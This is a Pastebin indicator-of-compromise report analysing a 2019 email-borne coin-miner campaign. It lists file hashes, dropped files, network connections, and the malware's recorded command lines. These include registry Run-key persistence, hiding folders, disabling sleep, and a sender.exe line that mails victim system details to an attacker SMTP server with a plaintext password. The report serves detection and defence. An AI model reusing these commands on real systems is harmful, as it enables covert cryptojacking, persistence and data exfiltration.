SHARE
TWEET

#coinminer_150319

VRad Mar 20th, 2019 (edited) 357 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #coinminer #bmcon #SCR
  2.  
  3. https://pastebin.com/eTPuCkhC
  4.  
  5. previous contact:
  6. https://pastebin.com/ELpZTc1y
  7.  
  8. attack_vector
  9. --------------
  10. email attach > SCR > C:\Intel\*  
  11.  
  12. email_headers
  13. --------------
  14. n/a
  15.  
  16. files
  17. --------------
  18. SHA-256     fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e
  19. File name   Платіжне доручення 1C №14343676173 - 2019.rar        [RAR archive data, vd4,]
  20. File size   735.93 KB
  21.  
  22. SHA-256     5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e
  23. File name   Платіжне доручення 1C №14343676173 - 2019.scr        [PE32 executable (GUI) Intel 80386, for MS Windows]
  24. File size   793.76 KB
  25.  
  26. SHA-256     40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
  27. File name   bmcon.exe                       [Intel 80386, for MS Windows, UPX compressed]
  28. File size   354.5 KB (363008 bytes)
  29.  
  30. SHA-256     1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
  31. File name   sender.exe                      [Intel 80386, for MS Windows]
  32. File size   220 KB (225280 bytes)
  33.  
  34. SHA-256     b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7
  35. File name   bm-xmrig.exe                        [PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows]
  36. File size   750.5 KB (768512 bytes)
  37.  
  38. activity
  39. **************
  40. SEND SMTP_587
  41. --------------
  42. 220 vserver321.axc.nl ESMTP Exim 4.91 Wed, 20 Mar 2019 15:55:26 +0100
  43. EHLO apm11
  44. 250-vserver321.axc.nl Hello apm11 [victim-Public-IP]
  45. 250-SIZE 52428800
  46. 250-8BITMIME
  47. 250-PIPELINING
  48. 250-AUTH PLAIN LOGIN
  49. 250-STARTTLS
  50. 250 HELP
  51. AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
  52. 235 Authentication succeeded
  53. MAIL FROM:<sender@download-files.site> BODY=8BITMIME
  54. 250 OK
  55. RCPT TO:<recipient@account-identification.site>
  56. 250 Accepted
  57. DATA
  58. 354 Enter message, ending with "." on a line by itself
  59. Date: Tue, 19 Mar 2019 14:39:17 +0200
  60. From: Robot Ukr<sender@download-files.site>
  61. To: recipient@account-identification.site
  62. X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
  63. Message-ID: <01d4de50$Blat.v3.0.7$c4997ae5$478b0b0efc2@download-files.site>
  64. Subject: PC-APM11/User-support
  65. MIME-Version: 1.0
  66. Content-Transfer-Encoding: quoted-printable
  67. Content-Type: text/plain;
  68.  charset="UTF-8"
  69.  
  70. OS-Windows7 x64/CPU-*** 2.50GHz/Cores-2/G=
  71. PU-...................... VGA ...................... ..............
  72. .
  73. 250 OK id=1h6ccp-002kK0-KG
  74. QUIT
  75. 221 vserver321.axc.nl closing connection
  76.  
  77. netwrk
  78. --------------
  79. http
  80. 93.184.221.240  ctldl.windowsupdate.com     GET /msdownload/update/v3/static/...        HTTP/1.1    Microsoft-CryptoAPI/6.1
  81. 178.18.231.122  isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrD...           HTTP/1.1    Microsoft-CryptoAPI/6.1
  82. 178.18.231.114  ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrD...           HTTP/1.1    Microsoft-CryptoAPI/6.1
  83. 93.184.221.240  ctldl.windowsupdate.com     GET /msdownload/update/v3/static/t...       HTTP/1.1    Microsoft-CryptoAPI/6.1
  84. 178.18.231.121  crl.microsoft.com       GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1    Microsoft-CryptoAPI/6.1
  85.  
  86. ssl
  87. 88.99.38.225    dl.browsermine.com      Client Hello   
  88.  
  89. comp
  90. --------------
  91. bmcon.exe   3064    TCP localhost   49518   88.99.38.225    443 ESTABLISHED
  92. bmcon.exe   3064    TCP localhost   49519   93.184.221.240  80  ESTABLISHED
  93. bmcon.exe   3064    TCP localhost   49520   178.18.231.122  80  ESTABLISHED
  94. bmcon.exe   3064    TCP localhost   49521   178.18.231.114  80  ESTABLISHED
  95. bmcon.exe   3064    TCP localhost   49522   88.99.38.225    443 ESTABLISHED
  96.  
  97. bm-xmrig.exe    1776    TCP localhost   49524   159.69.189.115  4444    ESTABLISHED
  98.  
  99. svchost.exe 244 TCP localhost   49525   93.184.221.240  80  ESTABLISHED
  100. svchost.exe 244 TCP localhost   49526   178.18.231.121  80  ESTABLISHED
  101.  
  102. proc
  103. --------------
  104. "C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
  105. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  106.  
  107. C:\Windows\SysWOW64\cmd.exe ""C:\Intel\enable.cmd" "
  108. C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
  109.  
  110. C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
  111. C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
  112. C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
  113. C:\Windows\SysWOW64\powercfg.exe  -h off
  114.  
  115. C:\Windows\SysWOW64\attrib.exe ATTRIB  +s +h C:\Intel
  116. C:\Windows\SysWOW64\attrib.exe ATTRIB  +s +h C:\Intel\bmcon
  117.  
  118. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
  119. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
  120.  
  121. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
  122. C:\Intel\sender.exe  -to recipient@account-identification.site -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject  "PC-APM11/User-support" -body  "OS-Windows7 x64/CPU-*** CPU @ ***GHz/Cores-2/GPU-Стандартный VGA графический адаптер"
  123.  
  124. C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f
  125.  
  126. C:\Windows\SysWOW64\PING.EXE ping  -n 300 127.0.0.1
  127.  
  128. C:\Intel\bmcon.exe
  129. "C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
  130. "C:\Intel\bmcon\bm-xmrig.exe"
  131.  
  132. persist
  133. --------------
  134. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              19.03.2019 14:39
  135.  
  136. #1 BMCon            c:\intel\bmcon.exe  03.11.2018 2:42
  137.  
  138. #2 private  17.229.13.523.351 18.14.13.5356 Installation        17.19.11.15                                                    
  139. c:\intel\private.exe    20.06.1992 0:22
  140.  
  141. drop
  142. --------------
  143. C:\Intel\GfxUI.exe.config
  144. C:\Intel\IGFXDEVLib.dll
  145. C:\Intel\iglhxa32.vp
  146. C:\Intel\Impcd.cat
  147. C:\Intel\IntcDAuC.dll
  148. C:\Intel\mup.xml
  149. C:\Intel\private.exe
  150. C:\Intel\readme-VGA.txt
  151. C:\Intel\sender.exe
  152. C:\Intel\Setup2.if2
  153.  
  154. C:\Intel\bmcon\apps.json
  155. C:\Intel\bmcon\bmstart.exe
  156. C:\Intel\bmcon\bm-xmrig.exe
  157. C:\Intel\bmcon\bm-xmrig.json
  158. C:\Intel\bmcon\bm-xmrig-amd.exe
  159. C:\Intel\bmcon\bm-xmrig-amd.json
  160. C:\Intel\bmcon\bm-xmrig-nvidia.exe
  161. C:\Intel\bmcon\bm-xmrig-nvidia.json
  162. C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
  163. C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
  164. C:\Intel\bmcon\bm-xmrig-x32.exe
  165. C:\Intel\bmcon\nvrtc64_80.dll
  166. C:\Intel\bmcon\nvrtc64_100_0.dll
  167. C:\Intel\bmcon\nvrtc-builtins64_80.dll
  168. C:\Intel\bmcon\nvrtc-builtins64_100.dll
  169. C:\Intel\bmcon.exe
  170. C:\Intel\bmcon.json
  171.  
  172. # # #
  173. https://www.virustotal.com/gui/file/fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e/details
  174. https://www.virustotal.com/gui/file/5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e/details
  175. https://analyze.intezer.com/#/analyses/b2d98806-3481-4422-9f5c-07ffe8707cde
  176.  
  177. https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
  178. https://www.virustotal.com/gui/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
  179. https://www.virustotal.com/gui/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
  180. https://www.virustotal.com/gui/file/b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7/details
  181.  
  182. VR
  183.  
  184. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top